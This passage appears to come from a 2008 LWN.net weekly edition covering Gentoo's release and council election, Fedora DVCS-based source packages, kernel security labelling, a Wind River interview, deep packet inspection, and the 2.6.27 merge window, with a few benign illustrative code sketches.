  slow when building stuff (MIPS). On top of that, some software just doesn't
  build on some arches (no Java on alpha, for example) which can make deciding
  what to put on the LiveCD very hairy.
  
  People have lives. This is one that bit us this time: life struck at a very
  bad point (not that the event had been any better post-release). This
  occupied the time of a dev for a prolonged time. It made painfully obvious
  that in some spots, stand-in personnel wasn't there.


  In addition, Tobias cited three other problems:


Release work is unpopular. The release engineering team
  is perpetually undermanned, basically because the work is boring and
  otherwise unrewarding.

Bike shedding creates secrecy. Everyone's trying to
  chip in their own ideas of how things should work without having any
  experience or clue of what their ideas mean.

Reproducing installation bugs is hard. This is much
  like the Linux kernel because the release engineers just don't have the
  hardware. In some ways, it's worse, because the people who file distribution
  bugs about problems installing are often inexperienced Gentoo users who
  don't know how to file a good bug. Often, bugs that make it to the upstream
  project have already been filtered by the distribution, but that of course
  hasn't happened here.


  The main problem delaying 2008.0 was real life interfering with a critical
  developer. This is being addressed by creating new processes and backup
  people who can take over when others aren't around. As for the other
  problems, it's unclear how to fix them. Suggestions would be appreciated.


  The other major news in Gentoo is the election of a
  new council. The council is a group of 7
  people who lead Gentoo by making decisions on global issues. Two things make
  this election interesting:


It was a forced election that resulted indirectly from a
  controversy over expelling developers from the project. It happened
  because of a technicality in the Gentoo Linux
  Enhancement Proposal (GLEP) that gave the council its authority. The
  GLEP requires monthly meetings and forces an election if a majority of
  council members don't show up to a meeting. The controversy came about
  because this was an additional meeting beyond the usual one, specifically to
  discuss the appeals of 3 developers who were fired. It was poorly announced
  (only mentioned in the meeting minutes). It's unclear whether a majority of
  council members even agreed on the time.

The election involved people who think the social side of
  development matters versus people who think only
  the technical side matters. In Gentoo, the silent majority of
  developers rarely post to mailing lists, preferring to simply do
  development. Votes like this are often the only way they choose to express
  their opinions. In the past year, 50% of the
  traffic on the main development list came from 20 people, yet nearly 150
  people voted in the council election and more than 250 are listed as
  active.


 The 145 voters approach the highest number ever in a council
  election—here's how it compares with previous years:


  This is the highest turnout since the first year the council existed,
  showing a significant increase in interest by the developer community in who
  their leadership was compared to the intervening years. To understand
  exactly who they voted for, these
  histograms show how highly each candidate was ranked, in order of
  result. The left side indicates that a candidate was highly ranked, and the
  right side shows that a candidate was poorly ranked.


  Of particular interest is the position of "astinus," a developer who retired
  during the election but was still ranked above three other candidates. Since
  all three favor overlooking social issues when they come from someone
  with good technical contributions, this shows how strongly the Gentoo
  development community supports the creation of a friendlier
  environment.


  Notably, of the previous council, every single one of the five members who
  ran for the new council was re-elected. This shows that the community didn't
  care about the mistakes that resulted in the new election. It also shows
  that the community supported the existing council's actions and believed in
  what its members were saying about the need for social change within Gentoo.


  With its new release and its accompanying
  publicity, Gentoo has renewed interest from many users and has shown
  that it remains a distribution under active development. Having a new
  council in place for the next year puts Gentoo in position to rebuild its
  development community and keep development thriving so the publicity and new
  users gained by the release don't fade away.


		Fedora and distributed source packages


Fedora's new version of RPM, announced on July 9, has hit the
Rawhide repositories; after inspiring some initial cries of pain, it
would appear to be
settling in well.  It is good to see activity on Red Hat's version of RPM
after a long period where nothing much was happening.  In the process of
bringing this new code to Rawhide, the RPM developers have also inspired
some interesting side discussions on topics like whether such a major
change should have gone through the official "features" process first.  But
the most extended (and arguably most interesting) discussion came from an
unexpected direction.

Doug Ledford is known in kernel development circles, but, being an RHEL
engineer, he has not been 
seen much in the Fedora camp.  He joined the
RPM discussion with a feature request of
his own: he would like a set of tags which would facilitate the location of
a package's source code in a distributed version control system (DVCS).  So
these tags would indicate which DVCS is in use (git, mercurial, etc.),
where the repository is to be found, the tag corresponding to the source
code for a specific version of a package, etc.  And, Doug let it be known,
it would be nice if he could have those tags soon; tomorrow would be nice,
but before the Fedora 10 release in particular.

Once this information exists for a package, interesting things can be
done.  For example, source RPM packages could become much smaller; rather
than containing a tarball and a set of distributor-applied patches, it
could just hold the DVCS information.  An "installation" of that package
would then just go to the source repository and check out the sources from
there.  If the source repository is managed carefully, it could help the
cooperation between Fedora and the upstream projects; patches could be
pushed and pulled between repositories with ease.  This kind of mechanism
could also make it easier for the Fedora project to distribute "spins"
created by outsiders by reducing the resources required to make the
associated source code available.  See this
lengthy pitch from Doug for more discussion of the advantages of the
distributed source package approach.
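
As a rough illustration of the idea, the sketch below models the three pieces of information Doug asked for (which DVCS is in use, where the repository lives, and which tag matches the package version) and turns them into checkout commands.  The field names, the example URL, and the helper function are all hypothetical; they are not actual RPM tags or an existing RPM feature.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class DvcsSource:
    """Hypothetical source-location metadata for one package version."""
    vcs: str        # which DVCS is in use, e.g. "git" or "hg"
    repo_url: str   # where the repository is to be found
    tag: str        # tag corresponding to this version of the package


def checkout_commands(src: DvcsSource, dest: str) -> list[list[str]]:
    """Return the command lines that would fetch the tagged sources."""
    if src.vcs == "git":
        return [
            ["git", "clone", src.repo_url, dest],
            ["git", "-C", dest, "checkout", src.tag],
        ]
    if src.vcs == "hg":
        # "hg clone -u REV" updates the working copy to the given tag.
        return [["hg", "clone", "-u", src.tag, src.repo_url, dest]]
    raise ValueError(f"unsupported DVCS: {src.vcs}")


# Made-up package data, for illustration only.
example = DvcsSource(vcs="git", repo_url="git://example.org/foo.git", tag="foo-1.2-3")
for command in checkout_commands(example, "foo-src"):
    print(" ".join(command))
```

An "installation" of such a source package would then amount to running those commands rather than unpacking a tarball and applying patches.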

Of course, there are some obstacles too.  Not all projects are using a
DVCS, so integration with those projects would be more difficult.  Quite a
few projects have material in their repositories which, for legal reasons,
cannot be distributed by Fedora.  Finding a way to excise that material
without breaking the connections between repositories could be
challenging.  The tarballs distributed by many upstream projects - which
are the starting place for Fedora packages now - often contain changes
which are not reflected in their source repositories.  Those changes can
include the removal of non-distributable material, or simply generating
the configure file.


These challenges are real, and some of them will take a fair amount of work
to resolve.  But it seems clear that things eventually need to go in this
direction.  Tighter integration between projects and distributors can only
help the whole free software ecosystem work in a more efficient manner.
Tarballs reflect a form of frozen state which is entirely divorced from the
code's history - and from its future.  Or, as
Doug put it:


	It's all about the repo.  A tarball is something you hand off to
	poor saps that haven't joined the 21st century, all the while
	snickering at their inability to get with the times.  It is nothing
	more than a middle man step that interferes with efficiency of
	operation and that should be cut out of the loop.


A source package format that can maintain its
connections wherever it goes can only make the whole system work better.  So it
is good that the Fedora folks (including those beyond Doug who have been
thinking about this issue for a while now) are working on this problem.


There was, however, an interesting omission from the discussion; as far as
your editor can tell, nobody ever mentioned the work being done by the vcs-pkg project, which is aimed toward this goal:


	Our goal is to integrate version control with distro package
	maintenance. We want to recognise all involved in the process, from
	upstream, the package maintainers of the various distributions,
	their security and release teams, and power users, who aren't
	afraid to fix their own bugs, and give maximum flexibility to
	them. 


This group is mostly Debian-based, but its members are making a concerted
effort to create solutions which are independent of any given distribution
(or DVCS).  It can only make sense for Fedora to work with this project -
or at least have a look at what vcs-pkg is doing and come up with a good
excuse why a different solution has to be invented for Fedora.

The integration of distributed version control and packaging can only reach
its full potential if, among other things, it facilitates cooperation
between distributors and their upstream providers, their users, and,
importantly, other distributors.  If each distributor brews up its own
solution (again), they'll have a hard time sharing their work with each
other.  Few upstream projects will have the patience to integrate with
several disparate distributor systems, so that integration will be much
less likely to happen.  All of this can be avoided, though, if the
distributors decide now to work toward some common standards for the use of
distributed version control in packaging.

		Kernel security problems: a response


I would like to try to clarify a few points in the article, "Handling
kernel security problems" by Jonathan Corbet.

First off, I speak only for myself, not for the other half of the Linux
-stable team, Chris Wright, who might totally disagree with me, nor for
the other kernel developers who help out with the security@kernel.org
alias, nor for my current employer Novell.  Also note that all of my
-stable development is done on my own time, and is not part of my role
at my current job.

All of that out of the way, I object to a few things stated in the
original article:


	It does seem that there has been a trend away from explicit
	recognition of security issues in the stable releases. The
	inclusion of CVE numbers was once common; in the 2.6.25 series,
	only 2.6.25.1, 2.6.25.2, and 2.6.25.5 had such numbers in the
	changelogs. It is, indeed, true that a straightforward reading of
	the stable release changelogs will not tell users whether those
	releases fix relevant security issues.


A number of times, when we do -stable releases, there are no CVE numbers
issued for the "security" related issues that are fixed in there.  This
happens when the fix is first made in Linus's tree, and is either
forwarded to the stable@kernel.org alias saying, "we need to get this
out now", or just by the fact that it is only later that people realize
that a CVE number should be allocated.

And yes, the trend is away from explicit recognition of security issues,
exactly following Linus's statement that you quote from.

It comes down to who are the users of the -stable kernel series.  I
personally see these kernels for two different groups of people:


 Those who want to follow the latest kernel.org releases and not rely
    on a distribution for their kernel versions.

 For distributions to base releases on, and to pick and choose
    patches from.


The first group should always update to the latest -stable kernel update
as they are relying on the -stable team to always provide them the
latest fixes that are known to be needed for them.  Simply marking
things as "security related" can be misguided as Linus points out.  The
change log entries should show all users what was fixed, and if they run
a machine where this code is used, then they should upgrade.  It's as
simple as that.

In fact, in the 2.6.25.11 release I tried to say exactly that:


	It contains one bugfix, any user of the 2.6.25 kernel on x86-64
	with untrusted local users is very STRONGLY recommended to
	upgrade.


How much clearer can I be?  Does a user of the -stable tree, who has to be
technically competent to be able to do such a thing in the first place,
need to know more to decide if they need to upgrade their machines or not?
It seems people are upset that I am no longer using the magic words
"security fix", and that is true, I am not saying that anymore.  
As Linus and others have noted, marking some bugs as being
"security-related" is not helpful, especially as not everyone can even
agree - or sometimes even know at release time - whether a bug has security
implications or not.

Also note that this release does not refer to a CVE number.  This is
because, as of this moment, there still is not a number assigned,
despite asking the relevant groups for such an assignment.  I never want
to hold up a release by waiting for any such number, so I personally
will just not use them in the future in -stable releases unless they are
already contained in the original changelog entry in Linus's tree.

The second group, the distributions, all seem very happy with how the
-stable releases are conducted.  They have the capability to pick and
choose from the fixes and apply them to their older kernel versions and
ship them to their customers as they see fit.  The distros all know what
things are security related by the fact that they know and understand
the code and the threat model as they have developers assigned to
handle such security issues, and have done so for years.

In your summary, you state:


It is good to have a clear sense for what the security problems in a
piece of code are. If nothing else, it helps the project itself to
understand where it stands with regard to security and whether things
are getting better or worse. So it would be nice if the kernel
developers could be a bit more diligent and organized in how they
track security issues, much like the tracking of regressions has
improved over the last couple of years.  


I think the individual developers of the kernel all know quite well what
the security problems for their code are.  This is backed up by the fact
that these developers are the ones usually making the fix and telling
the -stable team that a specific patch is needed to be added.

What you seem to be asking for is a way to somehow classify bugs and
fixes in the kernel tree as "security related" or not.  And that goes
back to Linus's original point.  To try to do so marginalizes bugs which
are somehow not so designated as not worth fixing.
However, if someone wants to do this work for the kernel community,
and it proves to be useful over time, I'll be the first in line to say
that I was wrong.

		Interview: Wind River's John Bruggeman


If you wanted a symbol of Linux's impact on the world of embedded systems,
you could do worse than consider the edifying case of Wind River's
Damascene conversion.  Once one of free software's fiercest critics, today
Wind River is a cheerleader for the benefits of
open source, of sharing, and of giving back to the community. 

John
Bruggeman is Wind River's Chief Marketing Officer.  Here he talks to
Glyn Moody about why you can't use any old Linux for embedded systems, the
respective strengths and weaknesses of the Linux-based mobile platforms
from the LiMo Foundation and
Google's Android, and
what effect Nokia's announcement that it
would be open-sourcing the Symbian operating system will have on the
sector. 

Once upon a time, Wind River was synonymous with anti-Linux: what happened?

The market changed, and I think that open source
became a very, very important part of the addressable market we wanted to
reach. And if Wind River was going to be relevant and going to be important
in the marketplace, we would have to have an open source and specifically a
Linux-based solution for our customers. So, basically, the market thrust us
into it, demanded that we do it, and I think it was all for the best that
that happened.

What do you have to do to Linux to make it suitable for the embedded
market?

The embedded marketplace has requirements that aren't
in the general enterprise computing market. Things like size become very
critical, and memory utilization and power management and some other
features like that. Standard Linux wasn't optimized or suited for device
types that face those challenges.

Those are kind of software elements, but there is also a hardware
element. In the enterprise computing space, you are basically living in an
[Intel architecture] world and everything is pretty constant and stable and
predictable. Well, that is the anti-case with what we see in embedded. You
have a plethora of hardware environments. Each hardware environment has
their own specific nuances and special techniques and tips and tricks. And
making Linux work really well with hardware is a tough problem.

How would you compare your Linux offering with your
proprietary VxWorks
solution?

VxWorks is where you need absolute real-time
determinism, where you need things like safety and security, [and to] meet
certain regulatory standards and certification standards: those kinds of
applications are the sweet spot for our VxWorks software.  More general
solutions, where application availability, middleware integration, [and]
where lots and lots of ecosystem partners are required, that's in the sweet
spot of our Linux software. 

Is there any reason why your Linux software couldn't take on the other
kinds of things as well?

I think, over time, probably not. But that's a long
time away. A great example of that would be security certification for an
airplane. The standards and the requirements to meet those certifications
are very, very complex. They are very difficult and I think Linux is a long
way away from being able to do that. 

What's the kind of split between the VxWorks and Linux, in terms of
revenue?

Today about 80% of our revenue is VxWorks, but the
fastest-growing segment of our business is Linux. It's growing in the
triple digits quarter over quarter over quarter. We announced it well north
of $50 million for us this year.

Do you think one day you'll ever be wholly open source?

Wholly? I don't think so. There will always be
certain types of devices in which VxWorks will be a superior solution. But
the Linux portion of our business will continue to grow, and I see a day
where our Linux business is every bit as big as the VxWorks business.

What are the key attractions of Linux for your customers? 

Let me start with Linux in general. The first is
availability of the ecosystem. The need to accelerate the pace of
development is becoming critical. Many, many of our customers used to be
vertical integrators - they even manufactured their own silicon and they
would go all the way up to the top. And we're seeing a change that's
happening at light speed, where they are shifting from a vertical
integrator to an application developer.  And they are really
differentiating themselves on the user experience, on the type of
applications they develop.

The attraction of Linux is there's this massive development community
developing that infrastructure stuff that they used to spend so much time
on, that enabled application development: they don't have to do that
anymore.  The second thing is obviously cost. They really can get it at a
significantly lower development cost than they did when they used to have
to build it themselves. 

What's your business model? 

We provide things like integration testing and
validation. Open source is a bunch of packages and the magic is how well
are they put together and how reliable are they, and how well has that been
tested, and can you validate and stand behind that? We have over 300
support engineers located globally around the world, in different time
zones.  We have the richest indemnity and warranty program in the
industry. We don't stand behind Wind River, we stand behind open
source. 

Moving on to the mobile phone space, can you say a little about LiMo and
Android, and what your involvement in those has been?

Linux has the opportunity to revolutionize the mobile
phone space - not just smart phones, but feature phones, converged phones,
[Mobile Internet Devices - MIDs].  What's holding it back right now is the
fragmentation. There are just way too many different Linux distributions.
What that means is the ecosystem can't aggregate and surround anything of
any critical mass. So, two initiatives have broken out that seem to be
aggregators or consolidators: one is LiMo and one is Android. We're not
smart enough to know which one is going to be the ultimate consolidator, so
we're tremendously active in both. 

We joined LiMo as a board member and we work very, very hard with the
architectural committee to become the Linux foundation for all LiMo-based
development.  What that means is the common integration environment, which
is the Linux-built system, the tool chain, is all based on Wind River
technology. And therefore any contribution that's made to LiMo [is] based
on our technology - we contributed that common integration environment to
the LiMo foundation.

[Open Handset Alliance's Android] was announced about six or nine months or
so after LiMo, and Google came out and said Wind River is their Linux
commercialization partner. We have been working with them for about two
years. We've done a number of hardware integrations for them. That's one of
our core competences: how do you get Android running on the hardware.

We have phones coming out for both. We see a lot of activity on both and a
lot of momentum for both.

How would you contrast the two initiatives?

LiMo truly is a consortium of equals. There are
multiple operators: Vodafone, Docomo, Verizon, Orange, others. A bunch of
carriers and a bunch of handset OEMs: Motorola, Samsung, LG, Panasonic,
NEC.  And the board is made up of those guys and Wind River. And we see
that really is sort of: how do we get a common ground between fierce
competitors? How do we, for the good of the industry, standardize around
that stuff that's non-differentiating?

OHA is really a Google-driven initiative. They make product decisions and
they make feature decisions. 

So, let's talk pros and cons about this. When it's not a democracy, when
the decision-making is very clear, decisions can be made quickly and things
move very fast.  On the LiMo side, where it's a lot of people, with a lot
of experience building phones, who know what really matters, and what's
important and what works and what doesn't work, they can bring a lot of
different experience, a wealth of different perspectives together.


Sometimes it might take a little longer to make a decision over here but I
really understand and can see why that decision works over there. Where
this one races ahead, this one's a little more methodical and carefully
constructed. But they're both building compelling platforms and will both
be successful in the marketplace.

Alongside LiMo and Android, we will have an open source Symbian at some
point; what effect is that going to have on this whole market?

If you look at the smartphone market, it's 7% today
of the total phone marketplace. So, from a percentage basis, it's not
big. But what we're seeing is more and more feature phone-like capabilities
blurring with the smartphone. So even though it's a small part of the
market today, it's very strategic, because it does have implications
down-market on the feature phones.

Symbian's got 60% of the smartphone market. And Microsoft's 20 to 30% of
that market. Certainly they are not among equals, but Microsoft's been
gaining share against Symbian and against Nokia. So, I think this was an
aggressive and a bold and clever move against Microsoft.

Vis-a-vis Linux, the Symbian move just endorsed what was going on. It said
if you're going to be competitive, if you're going to be relevant years from
now, you'd better have an open source model. I love that endorsement of
Linux. 

On the other hand, their solution is years away. Nokia said: Well, we'll
have it in the first half in 2010. Both Android and LiMo will have phones
out by the end of this year. So, there should be a lot of activity. Now if
I'm an ecosystem member, am I going to wait for 2010, or am I going to
develop today, and address real design opportunities and real win
opportunities today?

I think Linux has a window of opportunity. We're going to see mass adoption
of Linux-based devices, whether they are phones, or converged devices or
MIDs, or whatever they are. However this market evolves, Linux is going to
have two years' worth of product out there in the marketplace, doing stuff,
before we see Symbian open source. While Nokia made a brilliant and bold
move, it might be too late, because there is enough Linux momentum,
especially behind OHA and LiMo, that I think they left that too
long. 

What about the other player in the closed-source world, Apple with its
iPhone?

Apple will always be what Apple is. Apple is just
fantastic, touches the super, niche, high end - somebody willing to pay
$700 for a phone. And there is a big market for that - if you think a big
market is 10 million phones. That's going to be there and that's not
threatened or messed with in any of this stuff, because they are always
going to come out with some really creative form factor or killer
application: they are going to touch 10 million people.  Three years from
now we'll see a couple billion phones in the marketplace. So, let Apple go
be content with that [10 million]. Let RIM go hit their niche part of the
market. I don't see that catching fire.

So you've got the smart phones, the MIDs and now these ultraportables - the
$300-400 machines that run GNU/Linux. How do you see that three-way contest
panning out?

I think all three devices meet certain use cases. I
don't see, in the near future, or even the mid-term future, a MID
overtaking a phone. There's a reason people talk on phones, but there's
this whole different class of people in different use scenarios, they need
a MID.


What is becoming very, very clear is, it's not about voice and it's not
about text or email, it's going to be about a true, rich Internet
experience.  Can a web page be represented on these devices at the same
clarity, the same quality, the same speed, as they are on the PC? When I
look at YouTube, I don't want to look at a fuzzy, webcam image. I want to
see [High Definition] quality on that thing. So, the devices we're seeing
today, they're being required to be able to deliver that level of video
representation and audio, that's [as good as] my music device and that's as
good as my home entertainment system.


In what other embedded sectors is Linux becoming important?

One of the fastest-growing areas of Linux we see
right now is in the automobile: in the in-vehicle entertainment, in the
dashboard, in the navigation.  Those, for years and years and years, have
been relegated to proprietary software stacks, because there's this big
stigma that an automobile is hard. It moves and it bumps and there's
temperature and there's all these safety requirements, and that's
proprietary stuff.


I think Apple helped change the game, because everybody wanted their iPod
in their car without a bunch of wires sticking around. Automobile
manufacturers worked on a development cycle that is five to seven years,
and all of a sudden the iPod hits and they have one quarter to figure out
how to get that thing in there.


This is a whole new business and process problem that the automotive
manufacturers had not been in before. They all stood up and said: We don't
know how to do this. And then the next new application came in and the next
new application and, all of a sudden, they said: There's been a tremendous
disruption in the industry; we've got to change the underlying principles
of how we design these applications.  And Linux is clearly the solution for
that, because it's all about the application and how extensible can the
platform be, and how well can we count on consumer-like speed in an
automotive-like marketplace.


The second market that I would say we're seeing is in the home. Things like
broadband access points - how you get content into the house: that's going
Linux now. Every new data standard, Linux is keeping pace with that better
than anything else out there.


We're seeing a general theme here. There's a real need for content - I want
YouTube and I want cable and I want satellite and I want data. We're seeing
those three C's of content, of connectivity, and of complexity. When you
have those three things there, Linux is a tremendous solution.

Glyn Moody writes about open source at opendotdotdot.

		Deep packet inspection


At its core, the internet is a set of agreements; not just on protocols,
but also on practices amongst carriers.  Part of what has allowed the
explosive growth—in both participants and services—of the
internet can be attributed to these agreements.  When a new technology like
deep packet inspection (DPI) comes along to threaten these long-standing
practices, it should be cause for concern.


Internet packets are constructed much like postal mail.  There is an
envelope with addressing information contained in the packet header and a
message which is contained in the 
data payload portion of the packet.  Internet carriers are supposed to make
their best effort to deliver a packet based on the information in its
header. DPI violates that compact by looking inside
the data portion, as the packet is en route to its destination, and making
decisions based on that.
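
The envelope analogy can be made concrete with a small sketch.  The code below builds a toy IPv4 packet, splits it into header and payload, and contrasts a decision that uses only the destination address with one that searches the data portion.  The function names, the addresses, and the one-string "signature" are illustrative assumptions; real DPI equipment is far more elaborate, and a real packet would carry a TCP header ahead of the application data.

```python
import socket
import struct


def build_ipv4_packet(src: str, dst: str, payload: bytes) -> bytes:
    """Build a minimal 20-byte IPv4 header followed by the payload.

    The checksum is left at zero; this is only a toy packet for parsing.
    """
    header = struct.pack(
        "!BBHHHBBH4s4s",
        0x45,                   # version 4, header length of 5 32-bit words
        0,                      # type of service
        20 + len(payload),      # total length
        0,                      # identification
        0,                      # flags and fragment offset
        64,                     # time to live
        socket.IPPROTO_TCP,     # protocol number
        0,                      # checksum (not computed here)
        socket.inet_aton(src),
        socket.inet_aton(dst),
    )
    return header + payload


def split_ipv4(packet: bytes) -> tuple[dict, bytes]:
    """Split a raw IPv4 packet into a few header fields and the payload."""
    header_len = (packet[0] & 0x0F) * 4   # IHL counts 32-bit words
    header = {
        "version": packet[0] >> 4,
        "protocol": packet[9],
        "src": socket.inet_ntoa(packet[12:16]),
        "dst": socket.inet_ntoa(packet[16:20]),
    }
    return header, packet[header_len:]


def next_hop_key(header: dict) -> str:
    """What a carrier is supposed to use: only the addressing information."""
    return header["dst"]


def payload_matches(payload: bytes, signature: bytes) -> bool:
    """What DPI adds: a look inside the data portion of the packet."""
    return signature in payload


packet = build_ipv4_packet("192.0.2.10", "198.51.100.7", b"\x13BitTorrent protocol")
header, payload = split_ipv4(packet)
print("deliver toward:", next_hop_key(header))
print("DPI signature hit:", payload_matches(payload, b"BitTorrent protocol"))
```

Only `next_hop_key()` is needed to deliver the packet; everything `payload_matches()` does goes beyond the best-effort delivery that carriers have traditionally provided.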


There are some potentially valid uses for DPI—network performance
monitoring and law enforcement surveillance, perhaps even with a warrant,
are two—but the potential for abuse is large.  Because network
processing has gotten to the point where devices can do more than just
observe and record, packets are being modified and generated on-the-fly in
a technique known as deep packet processing (DPP).


Various examples of DPI and DPP—generally lumped together as
DPI—have been in the news over the last year.  Comcast used DPI
to try and throttle
BitTorrent traffic, while Phorm and NebuAd have used
it to rewrite
web pages to deliver
advertising to unsuspecting users.  The DPI problem has gotten enough
attention that even
various governments have started showing interest.


The designer of User Datagram Protocol (UDP)—the connectionless
analog to Transmission Control Protocol (TCP)—David Reed recently
testified to the US Congress
about DPI.  In his testimony
[PDF] he outlines numerous technical issues, but the biggest may lead to
breaking the fundamental model of internet communication:

This is the real risk: [a] service or technology unnecessary to the correct
functioning of
the Internet is introduced at a place where it cannot function correctly
because it does [not]
know the endpoints' intent, yet it operates invisibly and violates rules of
behavior that
the end-users and end-point businesses depend [on] to work in a specific way.


We have seen this behavior from internet companies in other guises
as well.  Verisign and various ISPs have tried redirecting failed DNS
queries to pages they control (and generally fill with ads).  Once again,
that breaks many applications; it functions more or less correctly for web
browsing, but other applications depend on receiving proper errors when
querying for nonexistent domains.
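
A minimal sketch of the kind of application logic that breaks: the function below decides whether a hostname exists purely from whether the resolver reports an error.  The two stand-in resolvers are hypothetical and only simulate an honest resolver and a redirecting one; by default the function would use Python's real `socket.getaddrinfo()`.

```python
import socket


def name_exists(hostname, resolve=socket.getaddrinfo):
    """Return True if the resolver finds the name, False if the lookup fails.

    socket.gaierror also covers temporary failures; a real application
    would want to distinguish those from a nonexistent domain.
    """
    try:
        resolve(hostname, None)
    except socket.gaierror:
        return False
    return True


def honest_resolver(host, port):
    """Stand-in for a resolver that reports nonexistent domains properly."""
    raise socket.gaierror(socket.EAI_NONAME, "Name or service not known")


def redirecting_resolver(host, port):
    """Stand-in for a resolver that answers every query with an ad server."""
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("192.0.2.1", 0))]


# The ".invalid" top-level domain is reserved and never resolves.
print(name_exists("no-such-host.invalid", resolve=honest_resolver))
print(name_exists("no-such-host.invalid", resolve=redirecting_resolver))
```

With the redirecting resolver, the application is told that a nonexistent host is real, so any typo check, failover logic, or error message that depends on the lookup failing never triggers.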


Because many
ISPs hold a near-monopoly on high-speed access in a particular geographical
area, they can hold their customers hostage with little concern that
competition will come along to force a change.  It is this abuse of their
monopoly position that tends to interest regulators.  In addition, most of
their customers are unlikely to notice these "enhancements", making it
easier to get away with—at least until those more technically savvy
recognize and raise the issue.


Using encrypted communications, HTTPS for web browsing for example, is one
defense against DPI.  There is some cost associated with encryption, of
course, but it
is one that is likely to be borne if internet carriers persist in these
shenanigans.  Another option might be Obfuscated TCP, which is a
technique to do backwards-compatible encryption at the packet level.
Because it doesn't require all hosts to support it at once—it is
negotiated between the endpoints when the connection is
established—it could incrementally be added into the arsenal of tools
to thwart DPI. 


DPI uses techniques that have generally been
attributed to the "cracking" community.  Things like
man-in-the-middle attacks and IP address spoofing are difficult-to-solve
security problems for many applications.  When the "legitimate" middlemen
start manipulating packets using these means for their own benefit, they
come very 
close to—or cross—the line into illegality.


This is a battle about control; our freedoms to communicate and innovate on
the internet are at stake.  A phone system that randomly inserted
advertising into calls or a postal system that kicked back letters whose
contents it 
didn't like as undeliverable would not be considered functioning systems.
The internet requires the same treatment. 


		2.6.27 merge window, part 2


As of this writing, just over 6200 changesets have been merged into the
mainline git repository since the 2.6.26 release.  Merge activity appears
to be slowing down somewhat; it appears that most of the major trees have
been pulled.  Andrew Morton has not yet started to unload the -mm tree into
the mainline, though; until that happens, the merge window can be expected
to remain open.

User-visible changes merged since last week's summary include:


 There are new drivers for
     Samsung S3C SD/MMC interfaces,
     Atmel Multimedia card interfaces,
     Ricoh Bay1Controller cards,
     S/390 QDIO controllers,
     Renesas SuperH SH7710 and SH7712 Ethernet controllers,
     Option HSDPA/HSUPA mobile network devices,
     Broadcom BCM57711 Ethernet adapters,
     Mikrotik RouterBoard 532 series boards,
     Anysee DVB-T/C USB2.0 receivers,
     Sensoray 2255 video capture devices,
     Siano SMS10xx digital television devices,
     SuperH Mobile CEU camera controllers,
     Niagara2 hardware random number generators,
     HTC Shift (X9500) touchscreens,
     iNexio serial touchscreens,
     Sahara TouchIT-213 touchscreens,
     Xilinx XPS PS/2 controllers,
     Maxim MAX7301 GPIO expanders,
     HP iLO/iLO2 management processors,
     Atheros L1E Gigabit Ethernet adapters,
     Marvell XOR DMA engines,
     Synopsys DesignWare DMA controllers, and
     Intel version 3.0 I/OAT DMA engines.

     There is also a new PCI "slot detection driver" which will attempt to
     find all PCI slots in the system and create corresponding entries in
     /sys/bus/pci/slots/. 


 Worthy of note: the "gspca" set of video drivers, long maintained 
     outside of the mainline kernel tree, has been merged.  These drivers
     support a large number of video
     devices; with their merge, most video camera devices on the market
     are supported by Linux.

 The Fujitsu laptop driver has been updated with better hotkey and 
     backlight support for more Fujitsu models.

 The UBIFS filesystem for
     flash-based storage devices has been merged.

 The multiqueue
     networking patches have been merged.

 The IA-64 architecture has gained a paravirt_ops implementation to
     support virtualization.

 The new directories found at /sys/dev/char and
     /sys/dev/block contain symbolic links to the sysfs entries for
     devices, organized by device number.
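
The /sys/dev directories can be illustrated with a small user-space
sketch.  It assumes that each entry is named by major and minor number (as
in /sys/dev/char/1:3); the helper names sysfs_dev_path() and
sysfs_dev_path_for() are invented for this example and are not part of any
kernel or library interface.

```c
#define _DEFAULT_SOURCE         /* for S_IFCHR and friends under strict modes */
#include <assert.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>      /* major(), minor(), makedev() on Linux */
#include <sys/types.h>

/*
 * Build the /sys/dev path for a device node, given the st_mode and
 * st_rdev values that stat() reports for it.  Returns 0 on success,
 * -1 if the mode is not a device node or the buffer is too small.
 */
int sysfs_dev_path(mode_t mode, dev_t rdev, char *buf, size_t len)
{
    const char *kind;
    int n;

    assert(buf != NULL);
    if (S_ISCHR(mode))
        kind = "char";
    else if (S_ISBLK(mode))
        kind = "block";
    else
        return -1;

    n = snprintf(buf, len, "/sys/dev/%s/%u:%u", kind,
                 (unsigned int)major(rdev), (unsigned int)minor(rdev));
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Convenience wrapper: look up the sysfs path for a node such as /dev/null. */
int sysfs_dev_path_for(const char *node, char *buf, size_t len)
{
    struct stat st;

    if (stat(node, &st) != 0)
        return -1;
    return sysfs_dev_path(st.st_mode, st.st_rdev, buf, len);
}
```

Calling sysfs_dev_path_for() on a device node yields a path which, on a
kernel with these directories, can be handed to readlink() to find the
device's real location in sysfs.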


Changes visible to kernel developers include:


 The new suspend and
     hibernate infrastructure has been merged, providing a wider set of
     callbacks for power management events.  The PCI and platform bus
     interfaces have been enhanced with support for this new
     infrastructure. 

 The TTY layer continues to evolve; significant changes include the
     introduction of a new tty_port structure meant to hold
     information common to all TTY ports and a rework of the line
     discipline code.

 The mac80211 code has a new module which can simulate any number of
     IEEE 802.11 radios; it is suitable for testing mac80211 functionality
     and associated user-space tools.

 There is a new "rfkill" mechanism for unified handling of "radio off"
     switches on wireless devices.

 A number of Video4Linux2 format-related callbacks have been renamed to
     make them match the names used with the associated buffer types.
     In addition, the vidioc_enum_fmt_vbi_cap() callback has been
     deprecated and marked for removal in 2.6.28.


 The videobuf layer now has support for controllers which cannot do
     scatter/gather I/O.

 The USB "gadget" framework has been massively reworked to provide
     better support for composite devices.

 The prototype for device_create() has changed: it now takes the
     additional drvdata pointer previously accepted only by
     device_create_drvdata().


     Those who see a resemblance to device_create_drvdata() are
     right; all in-tree users were converted over to that interface,
     the old device_create() was removed, and
     device_create_drvdata() was renamed.  For now, a macro makes
     calls to device_create_drvdata() do the right thing, but that
     macro will probably go away before the 2.6.27 final release.

 User-space UIO drivers can now write a signed value to the
     /dev/uioX device to enable and disable interrupts.

 Debugfs (finally) has a function for removing an entire directory
     tree: debugfs_remove_recursive().

     As a result, code creating hierarchies in debugfs no longer needs to
     remember the dentry of every file it creates.
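
The benefit of recursive removal can be seen in a user-space sketch.
Nothing here is debugfs code: struct node is a hypothetical stand-in for a
dentry, and node_create() and node_remove_recursive() are names made up for
the example.  The point is only that the caller keeps a single pointer, to
the top of the tree, and everything below it is cleaned up in one call.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

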